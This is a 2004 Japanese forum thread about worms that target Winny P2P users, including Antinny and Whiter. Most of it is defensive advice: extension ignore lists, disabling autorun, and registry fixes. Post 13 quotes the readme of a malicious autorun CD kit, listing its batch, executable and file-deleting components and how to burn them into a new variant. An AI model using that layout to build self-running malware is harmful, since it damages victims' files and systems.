5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警報】Winnyを狙ったワーム・ウイルス情報 Part10

1 :よ〜く考えよ〜 ウイルス危険だよ〜:04/03/02 15:12 ID:dRUm/y6k
anntiny、その他winnyで流れてるウイルスの概要、及び対処方etc
http://nyweb.hp.infoseek.co.jp/

関連ページ
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html

過去スレ
winnyのキャッシュフォルダのみを消すウィルス警報
http://tmp.2ch.net/test/read.cgi/download/1060003283/
【警報】Winnyを狙ったワーム・ウイルス情報 Part2
http://tmp.2ch.net/test/read.cgi/download/1060385909/
【警報】Winnyを狙ったワーム・ウイルス情報 Part3
http://tmp.2ch.net/test/read.cgi/download/1060700316/
【警報】Winnyを狙ったワーム・ウイルス情報 Part4
http://tmp.2ch.net/test/read.cgi/download/1061551896/
【警報】Winnyを狙ったワーム・ウイルス情報 Part5
http://tmp.2ch.net/test/read.cgi/download/1063637671/
【警報】Winnyを狙ったワーム・ウイルス情報 Part6
http://tmp2.2ch.net/test/read.cgi/download/1066288327/
【警報】Winnyを狙ったワーム・ウイルス情報 Part7
http://tmp2.2ch.net/test/read.cgi/download/1068654569/
【警報】Winnyを狙ったワーム・ウイルス情報 Part8
http://tmp2.2ch.net/test/read.cgi/download/1072600676/
【警報】Winnyを狙ったワーム・ウイルス情報 Part9
http://tmp2.2ch.net/test/read.cgi/download/1075998916/

2 :[名無し]さん(bin+cue).rar:04/03/02 15:12 ID:EM1d72d6
3?

3 :[名無し]さん(bin+cue).rar:04/03/02 15:14 ID:dRUm/y6k
以下はpart8からのコピペです 試す方は自己責任で。

[感染しないためにやっておくべきこと]
・ファイルの拡張子は表示させる。開くときは拡張子を確認 [必須]
・シングルクリックをダブルクリックにする
・アンチウイルスソフトのインストール、常駐、定期的に更新 [初心者は常駐必須]
・落としたファイルは必ずウイルススキャン
・exe, *.lzhなどの二重拡張子を無視リストに(ただし、マシンに負荷が掛かる)
・lzh,zip,rarなど圧縮ファイルは解凍後要注意
・exeファイルは完全自己責任
・こまめにバックアップ
・nyをProgramFilesに置かない、CacheとDownフォルダは詳細表示にする
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というダミーファイルを作る
(サイズは0kbでも可)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限
 ただしインストーラで弊害が起こることもある
・CD/DVDの自動実行はオフ。各OSでのやり方は↓ [必須]
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャー]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000の場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
 ◆WinXPの場合
  1.エクスプローラで CD-ROM ドライブを右クリックして [プロパティ] をクリック
  2.[自動再生] タブをクリックし、ドロップダウンリストで「音楽 CD」を選択
  3.「実行する動作を選択」にチェックし、「何もしない」を選択して「OK」をクリック
※DaemonToolの自動起動をオフにしても意味は無い
・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)

4 :[名無し]さん(bin+cue).rar:04/03/02 15:18 ID:dRUm/y6k
無視リスト (以下をIgnore.txtにコピペ)

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0

※ただし、追加しすぎるとマシンに負荷が掛かるので注意


5 :[名無し]さん(bin+cue).rar:04/03/02 15:19 ID:dRUm/y6k
新スレ立てました〜

あんまり確認しなかったので間違ってたら総理

6 :[名無し]さん(bin+cue).rar:04/03/02 16:54 ID:OwRPy6sw


7 :[名無し]さん(bin+cue).rar:04/03/02 17:03 ID:s+S0SSRc
ちょっと気になったので報告してみます
PC起動してからずっとCPU100%になってるのは仕様ですか?
確か昨日か一昨日あたりでなり始めました。

8 :[名無し]さん(bin+cue).rar:04/03/02 17:08 ID:RtlOJ+zx
http://user.auctions.yahoo.co.jp/jp/user/kenken328jp?
これ激レア!!買うべし!!

9 :[名無し]さん(bin+cue).rar:04/03/02 17:14 ID:s+S0SSRc
916 :[名無し]さん(bin+cue).rar :04/03/01 02:15 ID:Q9SFeUGY
【安定】ウイルスバスター2004 Part14【安心】
http://pc.2ch.net/test/read.cgi/sec/1077518579/

558 名無しさん@お腹いっぱい。 sage New! 04/03/01 01:19
msstkprp32.exeとmsisam.exeとか言うのが突然www.accs.or,jpにアクセスし始めたんだが
どうもPCが重いからタスクマネージャ見たらSystemとmswsockdrv.exeでCPU食いつぶしてるし
結局日付をずらしたら収まった
んで、ACCSのサイトいま落ちているもよう。
とりあえず上のプロセス殺さないとCPUが100%でなにも出来ん。
これはACCS攻撃ウィルスじゃないのか?3月1日0時から動き出したような感じ。
誰か同じ状態の人いますか?



過去ログみたらこのようなことが書かれていますがどのように対処すれば?

10 :[名無し]さん(bin+cue).rar:04/03/02 17:15 ID:6hnld3KT
┃| ┃||| ヽ                   ノ    ノ∨∨∨ヽ |
|┃| ┃|||ヽ                   ノ  ) 百  ( |
|┃| ┃|||ヽ  /(((( ((ヽ(( )ノ)))ノ))ヽ  ノ  )  %   ( |
|┃| ┃|||ヽ  〈 ̄\_     _/ ̄〉  ノ  )  中  ( |
|┃| ┃|||ヽ  | \__\ |l /__/|   /   )   の  ( |
|┃| ┃|||ヽ(ヽ |   _ \|lll|/ _   | /)/  )   百  (  |
|┃| ┃|||ヽ | | | / 0 \ ll| ,/ 0 \|| / /  )   パ  (  |
|┃| ┃|||ヽ ヽ|  三三 / | \ ̄三 | |/ /  )   │  (   |
|┃| ┃||| ヽ ∨ 三 / , |、    三 ∨ /   )   セ  (  |
|┃| ┃|||  ヽ|       `l´        |/  ノ   ン  (  |
|┃| ┃|||   | |      l⌒⌒l     | |   ⌒)  ト  ( |
|┃| ┃|||   |  \   |/γヽ|   / |     )  オ   (  |
|┃| ┃|||    |   \  (___)  /   |     )  ォ  ( |
|┃| ┃|||   |     \     /     |     ∨∨∨∨| |

11 :[名無し]さん(bin+cue).rar:04/03/02 17:15 ID:mRdAqtca
感染しないためにやっておくべきこと
・ファイルの拡張子は表示させる。開くときは拡張子を確認 [必須]
・シングルクリックをダブルクリックにする
・アンチウイルスソフトのインストール、常駐、定期的に更新 [常駐必須]
・落としたファイルは必ずウイルススキャン
・exe, *.lzhなどの二重拡張子を無視リストに(ただし、マシンに負荷が掛かる)
・lzh,zip,rarなど圧縮ファイルは解凍後要注意
・exeファイルは完全自己責任
・こまめにバックアップ
・nyをProgramFilesに置かない、CacheとDownフォルダは詳細表示にする
・whiter対策としてC:\Windows\SystemにWhismng.exeフォルダ作成
 (フォルダ名と同じファイルは置けないので防止できる)
・WhiterVBS簡易チェッカーでチェックしてみる
 http://mxtrojan.at.infoseek.co.jp/column02.html
・怪しい・危険なファイルはWinnyFileDatabaseでチェック
 http://nydb.info/
・CCDはautorunを切ってdaemonでマウントして
 中の実行ファイル(setup.exe)をアンチウイルスソフトでチェックする。
・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)

12 :[名無し]さん(bin+cue).rar:04/03/02 17:17 ID:mRdAqtca
・拡張子「.folder」で悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり。
 http://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限
 ただしインストーラで弊害が起こることもある
・CD/DVDの自動実行はオフ。
各OSでのやり方は↓。また窓の手などでソフトで簡単にオフに出来る。[必須]
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャー]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000の場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
 ◆WinXPの場合
  1.エクスプローラで CD-ROM ドライブを右クリックして [プロパティ] をクリック
  2.[自動再生] タブをクリックし、ドロップダウンリストで「音楽 CD」を選択
  3.「実行する動作を選択」にチェックし、「何もしない」を選択して「OK」をクリック
※DaemonToolの自動起動をオフにしても意味は無い

・新種ハケーンしたらここでサンプル提出しる
 http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

13 :[名無し]さん(bin+cue).rar:04/03/02 17:18 ID:mRdAqtca
549 名前:[名無し]さん(bin+cue).rar 投稿日:04/02/23 20:35 ID:kNK6RjB5

PC再インスコして、autorun切るのすれてて、「Autorunを切ってないような初心者は少し痛い目を見てください。 Version 2」
っつーのに引っかかってしまいますた。。。
すぐにタスクマネージャーからそれらしいの切ったんですけど、このまま再起動しても大丈夫でしょうか。。。
こんなtxtファイルも同封されてました。
=======================================================================
◆ファイル構成

  6つ揃えてCDに一緒に焼き込めば、即席で亜種が作成できます。
  ただのbatなのでノートン先生も何のその。(そーでもない)
  悪用した結果は自己責任ですよ。(ひっかかる人いないだろうけど)

Autorun.inf Setupが起動するように指定。
Setup.bat bug起動、分身作成、Setupcfg起動。
bug.exe 67氏作成対半島用ソフト。詳しくは自分で調べましょう。
    bug.exe.lnk   再起動時にも音が鳴るように工夫。馬鹿は辛い……。
winny.sys bugの効果音。MIDI、WAVをリネームして使う。
Setupcfg.bat ファイルを消す。それだけ。
Readme.txt このファイル。
    その他 ただのカモフラージュ。別名容量稼ぎ。byねつ造君。
=======================================================================

14 :[名無し]さん(bin+cue).rar:04/03/02 17:25 ID:mRdAqtca
前スレから良さげなの貼ってきました。
autorun+batタイプに注意ですね・・・。

>>9
応急処置はタスクマネージャーからプログラム切る。
それからどうやって動作命令が出てるか調べる。
(スタートアップ、レジストリなど)
復元ポイントで大丈夫ならそれが一番楽かな。
だだ後の人のためにも原因を見つけて欲しい罠

15 :[名無し]さん(bin+cue).rar:04/03/02 17:38 ID:s+S0SSRc
>応急処置はタスクマネージャーからプログラム切る。
それはやっています。さすがにずっと100%じゃ辛いので。・゚・(ノд`)・゚・。
>それからどうやって動作命令が出てるか調べる。
>(スタートアップ、レジストリなど)
わかんないです(;´Д`)
>復元ポイントで大丈夫ならそれが一番楽かな。
更にわかんないです(;´Д`)

自分PC初心者なんで手取り足取り教えてください。・゚・(ノд`)・゚・。

16 :[名無し]さん(bin+cue).rar:04/03/02 17:48 ID:3X7872sR
P C 初 心 者 は n y な ん て や る な

17 :[名無し]さん(bin+cue).rar:04/03/02 17:49 ID:s+S0SSRc
n y は 俺 の 友 達 が 勝 手 に 使 う の だ よ 。


…今後使わせません(;´Д`)

18 :[名無し]さん(bin+cue).rar:04/03/02 17:53 ID:s+S0SSRc
三日ぐらいROMってますね(;´Д`)

なんかのウィルスなのだろうか…

19 :[名無し]さん(bin+cue).rar:04/03/02 17:56 ID:bMhk2fP8
>>1


20 :[名無し]さん(bin+cue).rar:04/03/02 17:56 ID:aFLxWQAu
最近.folderの拡張子のウイルスや、exeの前にスペースたくさん入れるやつがはやってるみたい
どちらもウイルスバスターで検出できない。今あるんだけど、誰か研究用に使う?

21 :前スレ965:04/03/02 17:57 ID:p9c+p2Nx
俺と同じだなぁ。
再インスコでも問題ナッシング。
OS以外のドライブはそのままでいけるっぽい。

22 :前スレ965 :04/03/02 17:58 ID:p9c+p2Nx
あ、>>18な。

23 :[名無し]さん(bin+cue).rar:04/03/02 18:00 ID:aFLxWQAu
>>21
俺も100%になったけど、そのexeファイルはmsxmls.exeなんて名前だった。
MSに関係があるような名前でよくわからなかった。
とりあえずそのファイル消して様子見。今のところ問題はないっぽ

24 :[名無し]さん(bin+cue).rar:04/03/02 18:03 ID:EsltnIRR
まぁHDが無事なら別にいいじゃん

25 :mio:04/03/02 18:04 ID:axye9JNu
前スレでAntinny.Eへのリンクを貼った者ですが、詳細がありました。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.e.html
「ウイルス事典」で引っかからなかったため、削除されたかと思いましたが、
Googleで検索したら見つかりました。

>>前スレで、ブラスターについて書かれた方へ。
ブラスターは、まだそこそこ猛威を振るっています。
OSの再セットアップをするときは、可能ならば、PCを物理的にオフラインに
しましょう。再セットアップ後、パッチをダウンロードしてあてる場合は、
最感染しないようになるべく急いで行いましょう。

>>15
前スレの988の

【アルバム】 2004.02.18 CHEMISTRY 「One × One」.zip

を落としたので今から少し調べてみます。
ハッシュが貼ってなかったので、同じものか分かりませんが。
ちなみに私が落としたものはハッシュはb941410cd1d5bed404354d9326f505bbです。

Spybotは実行中のプロセス(ファイル)のパスが分かるので、
そのパスを元に問題のexeファイルを削除すればいいかもしれません。

26 :[名無し]さん(bin+cue).rar:04/03/02 18:04 ID:aFLxWQAu
なにも起こらないというのが逆に怖い

27 :[名無し]さん(bin+cue).rar:04/03/02 18:06 ID:p/g/vwE6
ウイルス感染者は被害者だけでなく
加害者になりうるって事だな。
もうウイルスが勝手にやった事だからというような
言い訳は通用しなくなる時代か。

28 :[名無し]さん(bin+cue).rar:04/03/02 18:17 ID:60Ro2OwQ
・CD/DVDの自動実行はオフ。各OSでのやり方は↓ [必須]
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャー]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000の場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
 ◆WinXPの場合
  1.エクスプローラで CD-ROM ドライブを右クリックして [プロパティ] をクリック
  2.[自動再生] タブをクリックし、ドロップダウンリストで「音楽 CD」を選択
  3.「実行する動作を選択」にチェックし、「何もしない」を選択して「OK」をクリック
※DaemonToolの自動起動をオフにしても意味は無い
・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)


これ。XPでやっても自動実行するね。
レジストリからいじらないとだめかな。

29 :[名無し]さん(bin+cue).rar :04/03/02 18:20 ID:aFbiQSCW
zip解凍したら本物のファイルが入ったフォルダと
おまけフォルダが付いていてそれをクリックしたら
(フォルダアイコンの形に似せたexe)
キャッシュ全部消えたよ・・・

30 :[名無し]さん(bin+cue).rar:04/03/02 18:38 ID:7uT5ABA3
>>28
ttp://member.nifty.ne.jp/~babel/winxp_tips.html

■CD-ROM オートランの設定
 グループポリシーを変更する方法とレジストリ操作による方法の二通りあります。

グループポリシーを使用する方法。
グループポリシーエディタgpedit.mscを起動。[コンピュータの構成][管理テンプレート][システム]に[自動再生機能を無効にする]という項目があるので[有効]にするとオートランがオフに[無効]にするとオートランがオンになります

レジストリを変更する方法
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorunの値を0にすればオフ、1にすればオンになる。ちなみにリブートしないと設定値が有効にならないのでご注意下さい。

ぷらす、シフト押しながらの3パターン。

31 :[名無し]さん(bin+cue).rar:04/03/02 18:44 ID:HtpQ5Xf+
知らないファイルがダウソされてた ((((( ゜д゜)))))ガクガクブルブル
しかもその中に漏れがny使ってる場面が画像ファイルとしてまぎれてた
さらにさらにダウソフォルダがny上に公開されてしまう!?

  ウイルスなのか?
  でもオンラインスキャンしても何もでなかったが?

32 : :04/03/02 18:47 ID:IzwYeY7A
>>15
初心者が痛い目をみて一歩一歩、上級者に近づいていく。美しい光景だ。

33 :[名無し]さん(bin+cue).rar:04/03/02 18:52 ID:W/1YSVIT
おぃおぃお前らのせいで鯖がふっとんだぞ
もう2日ぐらい復旧してないぞ

http://www.accsjp.or.jp/
http://www.accs.or.jp/

34 : :04/03/02 18:57 ID:IzwYeY7A
>>31
精神科(ry

35 :mio:04/03/02 18:58 ID:axye9JNu
【アルバム】 2004.02.18 CHEMISTRY 「One × One」.zip

この名前で地引網をして現在、ふたつのファイルを落としました。
しかし、問題のtxtのアイコンをしたexeはありません。
前スレの>>988へ、あなたの落としたファイルのハッシュを。

36 :[名無し]さん(bin+cue).rar:04/03/02 19:14 ID:6P49u5LC
>>33
ちゃんと区別しろ

37 :[名無し]さん(bin+cue).rar:04/03/02 19:28 ID:jGkku/Pb
こわい

38 :[名無し]さん(bin+cue).rar:04/03/02 19:35 ID:lReecZLk
>>31
氏ね☆

39 :[名無し]さん(bin+cue).rar:04/03/02 19:44 ID:rRoCP8f4
>>25
ブラスターはまだまだ脅威だよな。
OS再インスコ→感染まで最短記録10分だった。
3週間まえのはなし。

40 :[名無し]さん(bin+cue).rar:04/03/02 19:57 ID:3tNyUFkG
MSブラスタ対策として、Win2kをSP4統合化して用意して
対策パッチも用意している。

41 :すいません:04/03/02 20:11 ID:NC6zlVSp
ぬるぽウイルスにかかってしまい、即対処しまして大丈夫になったっぽいん
ですが、windows\Tempフォルダ内に「rzt3090.TMP」というファイルだけが
未だに削除されずに残ったままなんですが、これ平気でしょうか?
削除しようとすると「windows側で使用してるため削除出来ません」て
エラー出てしまうし。う〜ん。

42 :[名無し]さん(bin+cue).rar:04/03/02 21:09 ID:p/g/vwE6
>>31
検出されないものなんて腐るほどあるよ。
マイナーなトロイとかね。
>漏れがny使ってる場面が画像ファイルとしてまぎれてた
お前のPCライフは全て覗き見されてるって事だよ☆

43 :前スレ732:04/03/02 21:24 ID:xwmxHD83
自分はexeファイル実行後、即再セットアップしたので
CPU使用率が100%になる症状は出てません。
前スレ965さんと同じくOS以外のドライブはそのままでいけてます

44 :[名無し]さん(bin+cue).rar:04/03/02 21:33 ID:8B7R3v/h
(シングル)(2004.02.25) モーxxxxxxxxxxxxxxxxxxxにはならねぇ!〜(192kbps).zip
22,584,478
14d56b0a65bcae4042492e9d6d4f3a21

これなんか仕込んである。
>>35の探してるのと同じかも。
Nortonでもかからない。

何してるか分かるネ申いる?


45 :[名無し]さん(bin+cue).rar:04/03/02 21:54 ID:Ox90A+t6
CPU使用率は普通で動作もさほど重くないんだけど
タスクマネージャーのプロセスの一番下のSystem Idle Processってのだけ
CPUのとこが90とかある。でも使用率は普通。
いつもMX使ってて初めてNY使ったらこのザマか・・・
これどーするべき?

46 :[名無し]さん(bin+cue).rar:04/03/02 22:00 ID:x9wcuFnt
気になるならWindows使うのやめれば

47 :[名無し]さん(bin+cue).rar:04/03/02 22:02 ID:KNWQHuPX
>>45
System Idle Processって意味解ってるのか?

48 :[名無し]さん(bin+cue).rar:04/03/02 22:07 ID:hvDW9cVL
exeファイルは完全自己責任

と、テンプレにあるけど、この「exe」ってなんなの?
誰か教えてくり。なんかの実行ファイル?

49 :[名無し]さん(bin+cue).rar:04/03/02 22:14 ID:RzSbgSgj
>>48

これ読んで勉強しる
http://e-words.jp/w/EXEE38395E382A1E382A4E383AB.html

50 :XX:04/03/02 22:25 ID:LTRGTQeJ
ウイルスなんて恐くない!対策してないやつがアホ。

51 :[名無し]さん(bin+cue).rar:04/03/02 22:34 ID:sah1UoK4
CPU使用率100パーウィルスに感染
したみたいだ・・
どうすればいいの?

52 :[名無し]さん(bin+cue).rar:04/03/02 22:36 ID:6hnld3KT
おまけフォルダとかがすっごく怖い。
しかもそのおまけフォルダの中に入ってるおまけが.jpg の
なんの変哲もないがおまけとは呼べないようなファイルだと
何かが起きた気がしてとても怖い。
バックドアとか作られた場合はノートンで対処できるの?もうムリ?

53 : :04/03/02 22:45 ID:9ZeZu0Uo
exeファイルの中身を調べられるソフトがあったと思うんだけど
なんていうソフトだか忘れちゃったよ

54 :[名無し]さん(bin+cue).rar :04/03/02 22:47 ID:SJfuJwMo
CPU100パーウィルスの対処法は
フリーソフト等の削除ソフトを使って外から消せばいいですよ。
カーソルが触れるだけでCPU100になり地雷状態になりますよね
がんばってください。

55 :29:04/03/02 22:55 ID:aFbiQSCW
ちくしょー、ここじっくり読んで
anntinyっていう奴に引っかかってたことが分かったけど
手動では完全に駆除出来ないなぁ・・・

c¥_RESTORE¥に削除したいファイルがあるんだけどな〜
ウィルスソフトがないと無理ぽい

56 :[名無し]さん(bin+cue).rar:04/03/02 22:57 ID:UcoR5oUI
>>55
手動でも普通に削除できますよん。
とりあえずCドライブのシステムの復元をOFFにしてください

57 :[名無し]さん(bin+cue).rar:04/03/02 23:00 ID:GKrWv8E5
>>55 ウィルスソフトがないと無理ぽいって いれてないの?

58 :[名無し]さん(bin+cue).rar:04/03/02 23:03 ID:dKKadZja
CPU100%にはなるがaccsjp.or.jpへの
アタックはなくなった。

みんな7.1か?意外と3/1のアタック
exeに仕込んであったりして…

59 :[名無し]さん(bin+cue).rar:04/03/02 23:04 ID:6hnld3KT
そういえば、昔ny1の時にnyのexeアイコンにポインタ当てたら
激おもになってたけどあれは、百%の呪いだったのかなぁ

60 :[名無し]さん(bin+cue).rar:04/03/02 23:10 ID:W/1YSVIT
itmediaあたりで久保田が怒りの記者会見をするんだろうな

61 :29:04/03/02 23:53 ID:aFbiQSCW
>>56
_RESTOREはシステムの復元に関するフォルダで
システムの復元をOFFにすればフォルダ丸ごと削除しちゃっても
システム的になんら影響はないってこと?
それならサクッと削除しちゃうけど・・・

62 :[名無し]さん(bin+cue).rar:04/03/03 00:08 ID:v2XhkzW2
AntinnyもどきのVirus発見したんで四万テックに提出しときました。

63 :[名無し]さん(bin+cue).rar:04/03/03 01:42 ID:ewKF51G4
前スレにも書いたんだけど、
システムの復元を有効にすることが出来ない・・・。

「すべてのドライブでシステムの復元を無効にする」のチェックが外せない。
外して適用しても、
「1つ以上のドライブを有効または無効にしようとしたしたときエラーが発生しました。コンピュータを再起動して再試行して
ください。」
のエラーが出る。

mp3.exeでこうなったんだけど、解決法ってある?

64 :[名無し]さん(bin+cue).rar:04/03/03 01:55 ID:df8famML
凡ミスをしてしまった自分を責めつつ半裸でOS再インスコ

65 :[名無し]さん(bin+cue).rar:04/03/03 02:11 ID:MOw3Shgj
>>63
例のmp3(多数のスペース).exeを調べてみたら、

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore



DisableSR
CreateFirstRunRp
RestoreStatus

をいじっている様子です。
名前の意味は調べて無いので不明ですけど(見当はつきますけどね)、正常な場合、各データは上から、

0
1
1

になってるので、レジストリエディタを使って修正して、再起動してみてください。
レジストリエディタは窓の手で復活できます。

66 :[名無し]さん(bin+cue).rar:04/03/03 02:25 ID:MOw3Shgj
http://www.ftk.fujitsu.com/products/shunkai/product/readme/jyojyo_3f_readme.pdf

>システムの復元を無効にする(Windows XPのみ)
>設定値:
>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
>SystemRestore]
>"DisableSR"=dword:00000001
>標準値:

67 :63:04/03/03 02:44 ID:ewKF51G4
>>65-66
Disableの値が0と1で異なってますがどっちがいいんでしょう?

68 :[名無し]さん(bin+cue).rar:04/03/03 04:09 ID:MrMc3nWF
>>67
65で言っている「正常な場合」というのは、復元が有効な状態のこと。
66は「復元を無効にする」って書いてあるでしょ?
だから65-66は矛盾してないのよ。

●Diaable = 無効にする
●SR = SystemRestore = システム復元
●プログラミングの世界では一般に
 0 = False(偽)
 1 = True(真)


69 :[名無し]さん(bin+cue).rar:04/03/03 06:16 ID:r6ovYM7r
くだらない質問なのですが金髪幼女調教というaviファイルを落としたのですが削除できず、しかもとてもPCが重くなります。
どうやったら削除できるのでしょうか?

70 :[名無し]さん(bin+cue).rar:04/03/03 06:32 ID:o7dxsN9l
クラスタ設定でミスったのか?

ここ見ろ、あとageるな
【1を読んでネ】 Winny 初心者質問スレ Part70
http://tmp2.2ch.net/test/read.cgi/download/1077968219/13

71 :[名無し]さん(bin+cue).rar:04/03/03 08:56 ID:0urKFNPD
>>70
初心者質問スレのマスコット
いつ変わったんだ

72 :[名無し]さん(bin+cue).rar:04/03/03 09:03 ID:3d7L4N6s
だいぶ前から(・3・)と(・ω・)じゃないか?

73 :988:04/03/03 11:17 ID:cVo9xyTO
>>35
>しかし、問題のtxtのアイコンをしたexeはありません。
>前スレの>>988へ、あなたの落としたファイルのハッシュを。

たぶんこれ。
f021be0dbc67d7d771e98009033d6122
手元のファイルサイズが (91,658,953 バイト) で同じです。


74 :[名無し]さん(bin+cue).rar:04/03/03 12:09 ID:Eycqi9Vg
>>35
(アルバム)[2004.02.25] 玉置成実 - Greeting.zip
fd62a65e97f61fad27717f472265641c

73じゃないがこれにもtxtのアイコンをしたexeがあったよ。
間違って実行しちまったよ…((( ;゚Д゚)))ガクガクブルブル
色々と調べてウイルススキャンもしたが何か起こらなか不安だ

75 :[名無し]さん(bin+cue).rar:04/03/03 12:18 ID:aVDFPGvF
簡単なプログラムのアルバイト募集があったのでやってみたらウイルス作成だった。
もちろんその日にやめたけど。
業界の人も大変ですな。


76 :[名無し]さん(bin+cue).rar:04/03/03 12:19 ID:nX8JnEZu
>>75
署まで同行願えますか?

77 :[名無し]さん(bin+cue).rar:04/03/03 12:22 ID:dQd/8Gk3
>>75
どの業界なの?

78 :[名無し]さん(bin+cue).rar:04/03/03 12:24 ID:aVDFPGvF
高収入だからアヤシイと思ったが案の定。
割に合うんだか合わないんだか。
おまいらに気を付けろとゆうのも可笑しいけど報告ですた。


79 :[名無し]さん(bin+cue).rar:04/03/03 12:34 ID:hm99CcPL
皆ノートン2004買いましょう
さぁお買い得お買い得

( ^,_J^)ノ<ノートン先生2005買おうよ!

80 :63:04/03/03 13:27 ID:ewKF51G4
>>65
言うとおりやってみましたが、
「システムの復元はこのコンピュータを保護できません。
コンピュータを再起動して、システムの復元を再実行してください。」
となってしまいます。

CもDドライブもシステムの復元が停止状態になって、変えられないし・・・。

81 :[名無し]さん(bin+cue).rar:04/03/03 13:35 ID:mmBXFQRq
>>80
セーフモードでもダメか?

82 :63:04/03/03 13:54 ID:ewKF51G4
>>81
セーフモードでもダメでした。

ちなみにノートン先生もスーパーバイザーでログオンしろとか言われて設定出来ない。
管理者でログオンしてるのに何でだろ・・・。

83 :[名無し]さん(bin+cue).rar:04/03/03 14:39 ID:ED7LCp4U
>>82
エラーログみれ

84 :[名無し]さん(bin+cue).rar:04/03/03 15:23 ID:0a3VmfWT
激しく遅レスだが
俺は42じゃないけどPart7の43ありがとう。

85 :[名無し]さん(bin+cue).rar:04/03/03 17:49 ID:SydEeLMa
HDDを物理的にリードオンリーにする機能ってないですか
かつて働いてたとこにあった汎用系大型コンピュータにはあったんですけど

86 :[名無し]さん(bin+cue).rar:04/03/03 18:24 ID:U8m83snn
>>74
さっきnortonでスキャンしたら W32.HLLW.Antinny として検知されるようになってたよ。

87 :[名無し]さん(bin+cue).rar:04/03/03 18:29 ID:FxBEquVm
俺の場合、フォルダのアイコンしたexeファイルをクリックしてしまった。
txtのアイコンじゃなかったけど同じなのかなぁ?
たぶんそのせいだと思うけど、Cドライブ直下にあるファイルがcache化されて
cacheフォルダ内に入ってた。これって既出ですか?

ちなみに対処方がわからず放置してるんだけど・・・

88 :[名無し]さん(bin+cue).rar:04/03/03 18:39 ID:sODIBgDr
CCDをマウントした瞬間、Norton先生が赤と黄色のウインドウで
「ウイルスを検出しました W32.Whiter.Trojyan」
ふぅ〜、ドキドキだぜ・・。
今はCCDすら危ないのか。今までWhiterに2度やられてるからな。
でも引っ越し間近だし再インストールしたいからあえて起動してみよ。

89 :[名無し]さん(bin+cue).rar:04/03/03 18:41 ID:FxBEquVm
すまん、自己解決。
nyのフォルダ情報見たらBBSフォルダが2つになってて、
その片方がCドライブ直下に指定されてた。指定した覚えないけど・・・
とりあえずそれ消した。あのexeファイルのせいなのだろか・・・?

90 :[名無し]さん(bin+cue).rar:04/03/03 18:55 ID:1VzOGBFp
>>87>>89
どー考えても・・・ry

むやみにexeを実行するなよ。
詳しくないみたいだから再インスコお奨めします。

91 :[名無し]さん(bin+cue).rar:04/03/03 19:12 ID:FxBEquVm
>>90
工エエェェ(´д`)ェェエエ工
PC歴10年で仕事もPGなんだけど・・・

フォルダのアイコンだったから気が付かずにクリックしてもうたよ。
最新定義ファイルでノートン完全スキャンしてみたが何もかからなかったですよ。
これ何?知ってるなら教えてください・・・お願いします。

92 :[名無し]さん(bin+cue).rar:04/03/03 19:19 ID:cNewRhmj
>>91
工エエェェ(´д`)ェェエエ工
ご冗談を。

93 :[名無し]さん(bin+cue).rar:04/03/03 19:26 ID:1VzOGBFp
>>91
いや〜、だからexeアイコンでないアイコンに偽装して押させる、
プログラムを実行させるのが目的でしょ。
ノートンで発見されないのは亜種(?)だから。
対処は亜種だから漏れは知らないw
>>1の処のをやるっても亜種で全貌わからないから
再インスコが一番いいとは思う罠

漏れも最後に一言(・∀・)ニヤニヤ

工エエェェ(´д`)ェェエエ工
ご冗談を。


94 :[名無し]さん(bin+cue).rar:04/03/03 19:38 ID:MrMc3nWF
>>91

> 工エエェェ(´д`)ェェエエ工
> PC歴10年で仕事もPGなんだけど・・・



アリエナイw

95 :[名無し]さん(bin+cue).rar:04/03/03 19:39 ID:dQd/8Gk3
無駄に過ごした10年か。

96 :[名無し]さん(bin+cue).rar:04/03/03 19:47 ID:FxBEquVm
>>93
